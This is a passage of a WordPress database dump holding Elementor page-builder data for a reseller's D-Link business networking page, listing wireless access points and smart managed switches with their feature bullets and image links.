Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7332,3376,'_elementor_version','2.5.14'),(7333,3376,'_elementor_edit_mode','builder'),(7336,3377,'_wp_page_template','template-fullwidth.php'),(7337,3377,'_elementor_template_type','post'),(7338,3377,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance 